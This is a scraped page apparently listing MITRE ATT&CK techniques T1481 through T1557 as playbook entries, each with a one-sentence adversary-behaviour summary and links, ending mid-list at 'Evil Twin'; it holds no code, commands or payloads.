In Playbook
Web Service

Dead Drop Resolver (T1481.001)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure.

More Info

In Playbook
Web Service

Bidirectional Communication (T1481.002)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system.

More Info

In Playbook
Web Service

One-Way Communication (T1481.003)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output.

More Info

In Playbook

Domain Trust Discovery (T1482)

View on ATT&CK

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

More Info

In Playbook

Domain Generation Algorithms (T1483)

View on ATT&CK

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains.

More Info

In Playbook

Domain or Tenant Policy Modification (T1484)

View on ATT&CK

Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments.

More Info

In Playbook
Domain or Tenant Policy Modification

Group Policy Modification (T1484.001)

View on ATT&CK

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain.

More Info

In Playbook
Domain or Tenant Policy Modification

Trust Modification (T1484.002)

View on ATT&CK

Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.

More Info

In Playbook

Data Destruction (T1485)

View on ATT&CK

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.

More Info

In Playbook
Data Destruction

Lifecycle-Triggered Deletion (T1485.001)

View on ATT&CK

Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.

More Info

In Playbook

Data Encrypted for Impact (T1486)

View on ATT&CK

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

More Info

In Playbook

Disk Structure Wipe (T1487)

View on ATT&CK

Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.

More Info

In Playbook

Disk Content Wipe (T1488)

View on ATT&CK

Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.

More Info

In Playbook

Service Stop (T1489)

View on ATT&CK

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users.

More Info

In Playbook

Inhibit System Recovery (T1490)

View on ATT&CK

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

More Info

In Playbook

Defacement (T1491)

View on ATT&CK

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content.

More Info

In Playbook
Defacement

Internal Defacement (T1491.001)

View on ATT&CK

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems.

More Info

In Playbook
Defacement

External Defacement (T1491.002)

View on ATT&CK

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.

More Info

In Playbook

Stored Data Manipulation (T1492)

View on ATT&CK

Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.

More Info

In Playbook

Transmitted Data Manipulation (T1493)

View on ATT&CK

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.

More Info

In Playbook

Runtime Data Manipulation (T1494)

View on ATT&CK

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.

More Info

In Playbook

Firmware Corruption (T1495)

View on ATT&CK

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.

More Info

In Playbook

Resource Hijacking (T1496)

View on ATT&CK

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

More Info

In Playbook
Resource Hijacking

Compute Hijacking (T1496.001)

View on ATT&CK

Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

More Info

In Playbook
Resource Hijacking

Bandwidth Hijacking (T1496.002)

View on ATT&CK

Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

More Info

In Playbook
Resource Hijacking

SMS Pumping (T1496.003)

View on ATT&CK

Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.

More Info

In Playbook
Resource Hijacking

Cloud Service Hijacking (T1496.004)

View on ATT&CK

Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability.

More Info

In Playbook

Virtualization/Sandbox Evasion (T1497)

View on ATT&CK

Adversaries may employ various means to detect and avoid virtualization and analysis environments.

More Info

In Playbook
Virtualization/Sandbox Evasion

System Checks (T1497.001)

View on ATT&CK

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.

More Info

In Playbook
Virtualization/Sandbox Evasion

User Activity Based Checks (T1497.002)

View on ATT&CK

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments.

More Info

In Playbook
Virtualization/Sandbox Evasion

Time Based Evasion (T1497.003)

View on ATT&CK

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments.

More Info

In Playbook

Network Denial of Service (T1498)

View on ATT&CK

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users.

More Info

In Playbook
Network Denial of Service

Direct Network Flood (T1498.001)

View on ATT&CK

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target.

More Info

In Playbook
Network Denial of Service

Reflection Amplification (T1498.002)

View on ATT&CK

Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target.

More Info

In Playbook

Endpoint Denial of Service (T1499)

View on ATT&CK

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.

More Info

In Playbook
Endpoint Denial of Service

OS Exhaustion Flood (T1499.001)

View on ATT&CK

Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS).

More Info

In Playbook
Endpoint Denial of Service

Service Exhaustion Flood (T1499.002)

View on ATT&CK

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS).

More Info

In Playbook
Endpoint Denial of Service

Application Exhaustion Flood (T1499.003)

View on ATT&CK

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications.

More Info

In Playbook
Endpoint Denial of Service

Application or System Exploitation (T1499.004)

View on ATT&CK

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users.

More Info

In Playbook

Compile After Delivery (T1500)

View on ATT&CK

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code.

More Info

In Playbook

Systemd Service (T1501)

View on ATT&CK

Systemd services can be used to establish persistence on a Linux system.

More Info

In Playbook

Parent PID Spoofing (T1502)

View on ATT&CK

Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.

More Info

In Playbook

Credentials from Web Browsers (T1503)

View on ATT&CK

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.

More Info

In Playbook

PowerShell Profile (T1504)

View on ATT&CK

Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.

More Info

In Playbook

Server Software Component (T1505)

View on ATT&CK

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems.

More Info

In Playbook
Server Software Component

SQL Stored Procedures (T1505.001)

View on ATT&CK

Adversaries may abuse SQL stored procedures to establish persistent access to systems.

More Info

In Playbook
Server Software Component

Transport Agent (T1505.002)

View on ATT&CK

Adversaries may abuse Microsoft transport agents to establish persistent access to systems.

More Info

In Playbook
Server Software Component

Web Shell (T1505.003)

View on ATT&CK

Adversaries may backdoor web servers with web shells to establish persistent access to systems.

More Info

In Playbook
Server Software Component

IIS Components (T1505.004)

View on ATT&CK

Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence.

More Info

In Playbook
Server Software Component

Terminal Services DLL (T1505.005)

View on ATT&CK

Adversaries may abuse components of Terminal Services to enable persistent access to systems.

More Info

In Playbook

Web Session Cookie (T1506)

View on ATT&CK

Adversaries can use stolen session cookies to authenticate to web applications and services.

More Info

In Playbook

Network Information Discovery (T1507)

View on ATT&CK

Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

More Info

In Playbook

Suppress Application Icon (T1508)

View on ATT&CK

A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application.

More Info

In Playbook

Non-Standard Port (T1509)

View on ATT&CK

Adversaries may generate network traffic using a protocol and port pairing that are typically not associated.

More Info

In Playbook

Clipboard Modification (T1510)

View on ATT&CK

Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.

More Info

In Playbook

Video Capture (T1512)

View on ATT&CK

An adversary can leverage a device’s cameras to gather information by capturing video recordings.

More Info

In Playbook

Screen Capture (T1513)

View on ATT&CK

Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information.

More Info

In Playbook

Elevated Execution with Prompt (T1514)

View on ATT&CK

Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.

More Info

In Playbook

Input Injection (T1516)

View on ATT&CK

A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.

More Info

In Playbook

Access Notifications (T1517)

View on ATT&CK

Adversaries may collect data within notifications sent by the operating system or other applications.

More Info

In Playbook

Software Discovery (T1518)

View on ATT&CK

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.

More Info

In Playbook
Software Discovery

Security Software Discovery (T1518.001)

View on ATT&CK

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.

More Info

In Playbook

Emond (T1519)

View on ATT&CK

Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers.

More Info

In Playbook

Domain Generation Algorithms (T1520)

View on ATT&CK

Adversaries may use [Domain Generation Algorithms](https://attack.

More Info

In Playbook

Encrypted Channel (T1521)

View on ATT&CK

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook
Encrypted Channel

Symmetric Cryptography (T1521.001)

View on ATT&CK

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook
Encrypted Channel

Asymmetric Cryptography (T1521.002)

View on ATT&CK

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol.

More Info

In Playbook
Encrypted Channel

SSL Pinning (T1521.003)

View on ATT&CK

Adversaries may use [SSL Pinning](https://attack.

More Info

In Playbook

Cloud Instance Metadata API (T1522)

View on ATT&CK

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

More Info

In Playbook

Evade Analysis Environment (T1523)

View on ATT&CK

Malicious applications may attempt to detect their operating environment prior to fully executing their payloads.

More Info

In Playbook

Implant Internal Image (T1525)

View on ATT&CK

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment.

More Info

In Playbook

Cloud Service Discovery (T1526)

View on ATT&CK

An adversary may attempt to enumerate the cloud services running on a system after gaining access.

More Info

In Playbook

Application Access Token (T1527)

View on ATT&CK

Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems.

More Info

In Playbook

Steal Application Access Token (T1528)

View on ATT&CK

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

More Info

In Playbook

System Shutdown/Reboot (T1529)

View on ATT&CK

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

More Info

In Playbook

Data from Cloud Storage (T1530)

View on ATT&CK

Adversaries may access data from cloud storage.

More Info

In Playbook

Account Access Removal (T1531)

View on ATT&CK

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.

More Info

In Playbook

Archive Collected Data (T1532)

View on ATT&CK

Adversaries may compress and/or encrypt data that is collected prior to exfiltration.

More Info

In Playbook

Data from Local System (T1533)

View on ATT&CK

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.

More Info

In Playbook

Internal Spearphishing (T1534)

View on ATT&CK

After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization.

More Info

In Playbook

Unused/Unsupported Cloud Regions (T1535)

View on ATT&CK

Adversaries may create cloud instances in unused geographic service regions in order to evade detection.

More Info

In Playbook

Revert Cloud Instance (T1536)

View on ATT&CK

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence.

More Info

In Playbook

Transfer Data to Cloud Account (T1537)

View on ATT&CK

Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.

More Info

In Playbook

Cloud Service Dashboard (T1538)

View on ATT&CK

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features.

More Info

In Playbook

Steal Web Session Cookie (T1539)

View on ATT&CK

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

More Info

In Playbook

Code Injection (T1540)

View on ATT&CK

Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application.

More Info

In Playbook

Foreground Persistence (T1541)

View on ATT&CK

Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access.

More Info

In Playbook

Pre-OS Boot (T1542)

View on ATT&CK

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system.

More Info

In Playbook
Pre-OS Boot

System Firmware (T1542.001)

View on ATT&CK

Adversaries may modify system firmware to persist on systems.

More Info

In Playbook
Pre-OS Boot

Component Firmware (T1542.002)

View on ATT&CK

Adversaries may modify component firmware to persist on systems.

More Info

In Playbook
Pre-OS Boot

Bootkit (T1542.003)

View on ATT&CK

Adversaries may use bootkits to persist on systems.

More Info

In Playbook
Pre-OS Boot

ROMMONkit (T1542.004)

View on ATT&CK

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect.

More Info

In Playbook
Pre-OS Boot

TFTP Boot (T1542.005)

View on ATT&CK

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server.

More Info

In Playbook

Create or Modify System Process (T1543)

View on ATT&CK

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.

More Info

In Playbook
Create or Modify System Process

Launch Agent (T1543.001)

View on ATT&CK

Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

More Info

In Playbook
Create or Modify System Process

Systemd Service (T1543.002)

View on ATT&CK

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.

More Info

In Playbook
Create or Modify System Process

Windows Service (T1543.003)

View on ATT&CK

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence.

More Info

In Playbook
Create or Modify System Process

Launch Daemon (T1543.004)

View on ATT&CK

Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence.

More Info

In Playbook
Create or Modify System Process

Container Service (T1543.005)

View on ATT&CK

Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts.

More Info

In Playbook

Ingress Tool Transfer (T1544)

View on ATT&CK

Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions.

More Info

In Playbook

Event Triggered Execution (T1546)

View on ATT&CK

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.

More Info

In Playbook
Event Triggered Execution

Change Default File Association (T1546.001)

View on ATT&CK

Adversaries may establish persistence by executing malicious content triggered by a file type association.

More Info

In Playbook
Event Triggered Execution

Screensaver (T1546.002)

View on ATT&CK

Adversaries may establish persistence by executing malicious content triggered by user inactivity.

More Info

In Playbook
Event Triggered Execution

Windows Management Instrumentation Event Subscription (T1546.003)

View on ATT&CK

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.

More Info

In Playbook
Event Triggered Execution

Unix Shell Configuration Modification (T1546.004)

View on ATT&CK

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell.

More Info

In Playbook
Event Triggered Execution

Trap (T1546.005)

View on ATT&CK

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal.

More Info

In Playbook
Event Triggered Execution

LC_LOAD_DYLIB Addition (T1546.006)

View on ATT&CK

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries.

More Info

In Playbook
Event Triggered Execution

Netsh Helper DLL (T1546.007)

View on ATT&CK

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs.

More Info

In Playbook
Event Triggered Execution

Accessibility Features (T1546.008)

View on ATT&CK

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.

More Info

In Playbook
Event Triggered Execution

AppCert DLLs (T1546.009)

View on ATT&CK

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.

More Info

In Playbook
Event Triggered Execution

AppInit DLLs (T1546.010)

View on ATT&CK

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

More Info

In Playbook
Event Triggered Execution

Application Shimming (T1546.011)

View on ATT&CK

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.

More Info

In Playbook
Event Triggered Execution

Image File Execution Options Injection (T1546.012)

View on ATT&CK

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers.

More Info

In Playbook
Event Triggered Execution

PowerShell Profile (T1546.013)

View on ATT&CK

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.

More Info

In Playbook
Event Triggered Execution

Emond (T1546.014)

View on ATT&CK

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond).

More Info

In Playbook
Event Triggered Execution

Component Object Model Hijacking (T1546.015)

View on ATT&CK

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

More Info

In Playbook
Event Triggered Execution

Installer Packages (T1546.016)

View on ATT&CK

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content.

More Info

In Playbook
Event Triggered Execution

Udev Rules (T1546.017)

View on ATT&CK

Adversaries may maintain persistence through executing malicious content triggered using udev rules.

More Info

In Playbook

Boot or Logon Autostart Execution (T1547)

View on ATT&CK

Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.

More Info

In Playbook
Boot or Logon Autostart Execution

Registry Run Keys / Startup Folder (T1547.001)

View on ATT&CK

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.

More Info

In Playbook
Boot or Logon Autostart Execution

Authentication Package (T1547.002)

View on ATT&CK

Adversaries may abuse authentication packages to execute DLLs when the system boots.

More Info

In Playbook
Boot or Logon Autostart Execution

Time Providers (T1547.003)

View on ATT&CK

Adversaries may abuse time providers to execute DLLs when the system boots.

More Info

In Playbook
Boot or Logon Autostart Execution

Winlogon Helper DLL (T1547.004)

View on ATT&CK

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.

More Info

In Playbook
Boot or Logon Autostart Execution

Security Support Provider (T1547.005)

View on ATT&CK

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots.

More Info

In Playbook
Boot or Logon Autostart Execution

Kernel Modules and Extensions (T1547.006)

View on ATT&CK

Adversaries may modify the kernel to automatically execute programs on system boot.

More Info

In Playbook
Boot or Logon Autostart Execution

Re-opened Applications (T1547.007)

View on ATT&CK

Adversaries may modify plist files to automatically run an application when a user logs in.

More Info

In Playbook
Boot or Logon Autostart Execution

LSASS Driver (T1547.008)

View on ATT&CK

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems.

More Info

In Playbook
Boot or Logon Autostart Execution

Shortcut Modification (T1547.009)

View on ATT&CK

Adversaries may create or modify shortcuts that can execute a program during system boot or user login.

More Info

In Playbook
Boot or Logon Autostart Execution

Port Monitors (T1547.010)

View on ATT&CK

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation.

More Info

In Playbook
Boot or Logon Autostart Execution

Plist Modification (T1547.011)

View on ATT&CK

Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence.

More Info

In Playbook
Boot or Logon Autostart Execution

Print Processors (T1547.012)

View on ATT&CK

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

More Info

In Playbook
Boot or Logon Autostart Execution

XDG Autostart Entries (T1547.013)

View on ATT&CK

Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login.

More Info

In Playbook
Boot or Logon Autostart Execution

Active Setup (T1547.014)

View on ATT&CK

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

More Info

In Playbook
Boot or Logon Autostart Execution

Login Items (T1547.015)

View on ATT&CK

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges.

More Info

In Playbook

Abuse Elevation Control Mechanism (T1548)

View on ATT&CK

Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.

More Info

In Playbook
Abuse Elevation Control Mechanism

Setuid and Setgid (T1548.001)

View on ATT&CK

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context.

More Info

In Playbook
Abuse Elevation Control Mechanism

Bypass User Account Control (T1548.002)

View on ATT&CK

Adversaries may bypass UAC mechanisms to elevate process privileges on system.

More Info

In Playbook
Abuse Elevation Control Mechanism

Sudo and Sudo Caching (T1548.003)

View on ATT&CK

Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges.

More Info

In Playbook
Abuse Elevation Control Mechanism

Elevated Execution with Prompt (T1548.004)

View on ATT&CK

Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.

More Info

In Playbook
Abuse Elevation Control Mechanism

Temporary Elevated Cloud Access (T1548.005)

View on ATT&CK

Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources.

More Info

In Playbook
Abuse Elevation Control Mechanism

TCC Manipulation (T1548.006)

View on ATT&CK

Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions.

More Info

In Playbook

Use Alternate Authentication Material (T1550)

View on ATT&CK

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

More Info

In Playbook
Use Alternate Authentication Material

Application Access Token (T1550.001)

View on ATT&CK

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems.

More Info

In Playbook
Use Alternate Authentication Material

Pass the Hash (T1550.002)

View on ATT&CK

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls.

More Info

In Playbook
Use Alternate Authentication Material

Pass the Ticket (T1550.003)

View on ATT&CK

Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls.

More Info

In Playbook
Use Alternate Authentication Material

Web Session Cookie (T1550.004)

View on ATT&CK

Adversaries can use stolen session cookies to authenticate to web applications and services.

More Info

In Playbook

Unsecured Credentials (T1552)

View on ATT&CK

Adversaries may search compromised systems to find and obtain insecurely stored credentials.

More Info

In Playbook
Unsecured Credentials

Credentials In Files (T1552.001)

View on ATT&CK

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.

More Info

In Playbook
Unsecured Credentials

Credentials in Registry (T1552.002)

View on ATT&CK

Adversaries may search the Registry on compromised systems for insecurely stored credentials.

More Info

In Playbook
Unsecured Credentials

Bash History (T1552.003)

View on ATT&CK

Adversaries may search the bash command history on compromised systems for insecurely stored credentials.

More Info

In Playbook
Unsecured Credentials

Private Keys (T1552.004)

View on ATT&CK

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials.

More Info

In Playbook
Unsecured Credentials

Cloud Instance Metadata API (T1552.005)

View on ATT&CK

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

More Info

In Playbook
Unsecured Credentials

Group Policy Preferences (T1552.006)

View on ATT&CK

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP).

More Info

In Playbook
Unsecured Credentials

Container API (T1552.007)

View on ATT&CK

Adversaries may gather credentials via APIs within a containers environment.

More Info

In Playbook
Unsecured Credentials

Chat Messages (T1552.008)

View on ATT&CK

Adversaries may directly collect unsecured credentials stored or passed through user communication services.

More Info

In Playbook

Subvert Trust Controls (T1553)

View on ATT&CK

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs.

More Info

In Playbook
Subvert Trust Controls

Gatekeeper Bypass (T1553.001)

View on ATT&CK

Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs.

More Info

In Playbook
Subvert Trust Controls

Code Signing (T1553.002)

View on ATT&CK

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools.

More Info

In Playbook
Subvert Trust Controls

SIP and Trust Provider Hijacking (T1553.003)

View on ATT&CK

Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks.

More Info

In Playbook
Subvert Trust Controls

Install Root Certificate (T1553.004)

View on ATT&CK

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

More Info

In Playbook
Subvert Trust Controls

Mark-of-the-Web Bypass (T1553.005)

View on ATT&CK

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls.

More Info

In Playbook
Subvert Trust Controls

Code Signing Policy Modification (T1553.006)

View on ATT&CK

Adversaries may modify code signing policies to enable execution of unsigned or self-signed code.

More Info

In Playbook

Compromise Host Software Binary (T1554)

View on ATT&CK

Adversaries may modify host software binaries to establish persistent access to systems.

More Info

In Playbook

Credentials from Password Stores (T1555)

View on ATT&CK

Adversaries may search for common password storage locations to obtain user credentials.

More Info

In Playbook
Credentials from Password Stores

Keychain (T1555.001)

View on ATT&CK

Adversaries may acquire credentials from Keychain.

More Info

In Playbook
Credentials from Password Stores

Securityd Memory (T1555.002)

View on ATT&CK

An adversary with root access may gather credentials by reading `securityd`’s memory.

More Info

In Playbook
Credentials from Password Stores

Credentials from Web Browsers (T1555.003)

View on ATT&CK

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.

More Info

In Playbook
Credentials from Password Stores

Windows Credential Manager (T1555.004)

View on ATT&CK

Adversaries may acquire credentials from the Windows Credential Manager.

More Info

In Playbook
Credentials from Password Stores

Password Managers (T1555.005)

View on ATT&CK

Adversaries may acquire user credentials from third-party password managers.

More Info

In Playbook
Credentials from Password Stores

Cloud Secrets Management Stores (T1555.006)

View on ATT&CK

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

More Info

In Playbook

Modify Authentication Process (T1556)

View on ATT&CK

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts.

More Info

In Playbook
Modify Authentication Process

Domain Controller Authentication (T1556.001)

View on ATT&CK

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

More Info

In Playbook
Modify Authentication Process

Password Filter DLL (T1556.002)

View on ATT&CK

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

More Info

In Playbook
Modify Authentication Process

Pluggable Authentication Modules (T1556.003)

View on ATT&CK

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts.

More Info

In Playbook
Modify Authentication Process

Network Device Authentication (T1556.004)

View on ATT&CK

Adversaries may use [Patch System Image](https://attack.

More Info

In Playbook
Modify Authentication Process

Reversible Encryption (T1556.005)

View on ATT&CK

An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems.

More Info

In Playbook
Modify Authentication Process

Multi-Factor Authentication (T1556.006)

View on ATT&CK

Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.

More Info

In Playbook
Modify Authentication Process

Hybrid Identity (T1556.007)

View on ATT&CK

Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.

More Info

In Playbook
Modify Authentication Process

Network Provider DLL (T1556.008)

View on ATT&CK

Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process.

More Info

In Playbook
Modify Authentication Process

Conditional Access Policies (T1556.009)

View on ATT&CK

Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts.

More Info

In Playbook

Adversary-in-the-Middle (T1557)

View on ATT&CK

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.

More Info

In Playbook
Adversary-in-the-Middle

LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)

View on ATT&CK

By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.

More Info

In Playbook
Adversary-in-the-Middle

ARP Cache Poisoning (T1557.002)

View on ATT&CK

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices.

More Info

In Playbook
Adversary-in-the-Middle

DHCP Spoofing (T1557.003)

View on ATT&CK

Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network.

More Info

In Playbook
Adversary-in-the-Middle

Evil Twin (T1557.004)

View on ATT&CK
